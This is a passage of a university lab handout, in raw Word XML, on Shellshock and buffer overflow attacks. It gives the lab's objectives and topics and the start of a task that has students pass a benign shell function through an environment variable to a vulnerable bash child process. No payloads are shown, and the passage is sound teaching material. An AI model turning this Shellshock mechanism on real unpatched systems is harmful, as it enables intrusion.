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D41C" w14:textId="051BB61A" w:rsidR="002A4A88" w:rsidRDefault="00711907" w:rsidP="00F341CD">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Shellshock Attack</w:t>
      </w:r>
      <w:r w:rsidR="00F341CD" w:rsidRPr="00F341CD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Buffer Overflow Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043542F" w14:textId="08C33E08" w:rsidR="00F341CD" w:rsidRPr="000B7C89" w:rsidRDefault="00F341CD" w:rsidP="00F341CD">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7C89">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447E178" w14:textId="15CF68F3" w:rsidR="004626C5" w:rsidRDefault="000B7C89" w:rsidP="004626C5">
      <w:p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The learning objective of this lab is for students to </w:t>
      </w:r>
      <w:r w:rsidR="00FA2782">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>understand</w:t>
      </w:r>
      <w:r w:rsidR="00FC7E8D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005837EF">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="004626C5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">hellshock vulnerability and buffer overflow vulnerability, and </w:t>
      </w:r>
      <w:r w:rsidR="00BD2837">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidR="004626C5" w:rsidRPr="004626C5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the first-hand experience on </w:t>
      </w:r>
      <w:r w:rsidR="004026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>shellshock attack and buffer overflow attack</w:t>
      </w:r>
      <w:r w:rsidR="00250D8B">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> and their impacts on the target programs</w:t>
      </w:r>
      <w:r w:rsidR="004626C5" w:rsidRPr="004626C5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> by putting what they have learned</w:t>
      </w:r>
      <w:r w:rsidR="004626C5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004626C5" w:rsidRPr="004626C5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>from class into action</w:t>
      </w:r>
      <w:r w:rsidR="004626C5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00250D8B">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> The lab covers the following topics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E124A7" w14:textId="77777777" w:rsidR="001145C2" w:rsidRDefault="00AD380C" w:rsidP="00F76601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>Shell function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404263FA" w14:textId="082B6BB3" w:rsidR="00F76601" w:rsidRDefault="001145C2" w:rsidP="00F76601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>S</w:t>
      </w:r>
      <w:r w:rsidR="00AD380C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>hellshock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability and attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E519680" w14:textId="72782779" w:rsidR="002373C6" w:rsidRDefault="002373C6" w:rsidP="00F76601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>Stack layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42708FD7" w14:textId="3BDBE79F" w:rsidR="002602ED" w:rsidRDefault="00F72AD7" w:rsidP="00F76601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" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Buffer overflow vulnerability and attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7763C1CE" w14:textId="0144BB49" w:rsidR="00976491" w:rsidRDefault="00976491" w:rsidP="00F76601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>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B82AC7" w14:textId="055EEB2E" w:rsidR="002602ED" w:rsidRPr="00976491" w:rsidRDefault="00725FA1" w:rsidP="00976491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>Countermeasures to buffer overflow attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666D6B7" w14:textId="6706F7FB" w:rsidR="002F32B7" w:rsidRPr="002F32B7" w:rsidRDefault="002F32B7" w:rsidP="002F32B7">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F32B7">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Lab Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563DC53" w14:textId="2F441E69" w:rsidR="002F32B7" w:rsidRPr="00DE2DC2" w:rsidRDefault="004E4C2C" w:rsidP="002F32B7">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2DC2">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Task 1: </w:t>
      </w:r>
      <w:r w:rsidR="00275A83">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Shell function and </w:t>
      </w:r>
      <w:r w:rsidR="009B5BA3">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00275A83">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hellshock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B640249" w14:textId="7E61A451" w:rsidR="00F76915" w:rsidRDefault="008F28BD" w:rsidP="00197B21">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">In this task, we </w:t>
      </w:r>
      <w:r w:rsidR="00E07202">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">study the </w:t>
      </w:r>
      <w:r w:rsidR="00EB789D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>shell function</w:t>
      </w:r>
      <w:r w:rsidR="00247AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00255B41">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00247AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">hellshock vulnerability, including </w:t>
      </w:r>
      <w:r w:rsidR="00EB789D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>how to pass a shell function to child process</w:t>
      </w:r>
      <w:r w:rsidR="00247AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">, why </w:t>
      </w:r>
      <w:r w:rsidR="003E0115">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00247AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">hellshock vulnerability happens, and how this </w:t>
      </w:r>
      <w:r w:rsidR="003E0115">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00247AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">hellshock vulnerability is leveraged to formulate </w:t>
      </w:r>
      <w:r w:rsidR="003E0115">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00247AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">hellshock attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C9ABC4" w14:textId="786D3438" w:rsidR="0006259A" w:rsidRDefault="006C7B2A" w:rsidP="00197B21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" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Define a </w:t>
      </w:r>
      <w:r w:rsidR="00D26345">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidR="00D26345">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00FD4D78">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="000A25F4">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable</w:t>
      </w:r>
      <w:r w:rsidR="00CE381D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r w:rsidR="005B0411" w:rsidRPr="005B0411">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B0411">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>with the following information</w:t>
      </w:r>
      <w:r w:rsidR="00550A8F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> (please replace </w:t>
      </w:r>
      <w:r w:rsidR="00C26CD7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:r w:rsidR="00550A8F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your </w:t>
      </w:r>
      <w:r w:rsidR="00D1108C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidR="002A5321">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidR="00550A8F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005B0411">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF2DCAE" w14:textId="54D4D3A4" w:rsidR="006C7B2A" w:rsidRDefault="006C7B2A" w:rsidP="006C7B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F559C6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Function name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7042">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F81EF" w14:textId="5BBBFB3D" w:rsidR="006C7B2A" w:rsidRDefault="006C7B2A" w:rsidP="006C7B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F559C6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00F559C6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unction body:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C7B2A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4148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firstname</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4148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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E31DD" w14:textId="77777777" w:rsidR="008838F3" w:rsidRDefault="005B0411" w:rsidP="00BA21D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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>The function definition format using environment variable is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDCF54" w14:textId="16818454" w:rsidR="005B0411" w:rsidRDefault="005B0411" w:rsidP="008838F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A25F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>function name='() { function body }'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121E569A" w14:textId="3585F909" w:rsidR="00BA21D8" w:rsidRDefault="00F46BDC" w:rsidP="00BA21D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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After the function definition, </w:t>
      </w:r>
      <w:r w:rsidR="00D26345">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">pass the </w:t>
      </w:r>
      <w:r w:rsidR="00853DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">defined </w:t>
      </w:r>
      <w:r w:rsidR="008F660C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="00853DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable</w:t>
      </w:r>
      <w:r w:rsidR="00D26345">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the child process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidR="00853DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00853DF9" w:rsidRPr="00853DF9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r w:rsidR="00970101">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo</w:t>
      </w:r>
      <w:r w:rsidR="008710F2" w:rsidRPr="008710F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00853DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>command.</w:t>
      </w:r>
      <w:r w:rsidR="00D26345">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D0382" w14:textId="26F62D54" w:rsidR="00853DF9" w:rsidRPr="00EE2FE1" w:rsidRDefault="004B7F63" w:rsidP="00EE2FE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to invoke a shell program in the child process. </w:t>
      </w:r>
      <w:r w:rsidR="00D65B54" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Under the shell in the child process,</w:t>
      </w:r>
      <w:r w:rsidR="00C47DDB" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
      <w:r w:rsidR="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C47DDB" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>echo $foo</w:t>
      </w:r>
      <w:r w:rsidR="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C47DDB" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C47DDB" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>declare -f foo</w:t>
      </w:r>
      <w:r w:rsidR="00EE2FE1" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C47DDB" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Describe your observation</w:t>
      </w:r>
      <w:r w:rsidR="000A3ED7" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> on these two executions, and explain why </w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">these two </w:t>
      </w:r>
      <w:r w:rsidR="00DB3F00" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>running results</w:t>
      </w:r>
      <w:r w:rsidR="000A3ED7" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> are different. </w:t>
      </w:r>
      <w:r w:rsidR="003D3676" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Also, i</w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> still a</w:t>
      </w:r>
      <w:r w:rsidR="00732975" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00732975" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable or shell function? If</w:t>
      </w:r>
      <w:r w:rsidR="00DB3F00" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> it is a shell function, </w:t>
      </w:r>
      <w:r w:rsidR="003D3676" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>please</w:t>
      </w:r>
      <w:r w:rsidR="00DB3F00" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidR="00DB3F00" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r w:rsidR="00DB3F00" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D3676" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">and describe </w:t>
      </w:r>
      <w:r w:rsidR="00DB3F00" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>the function output</w:t>
      </w:r>
      <w:r w:rsidR="003D3676" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001057B9" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00C47DDB" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65B54" w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
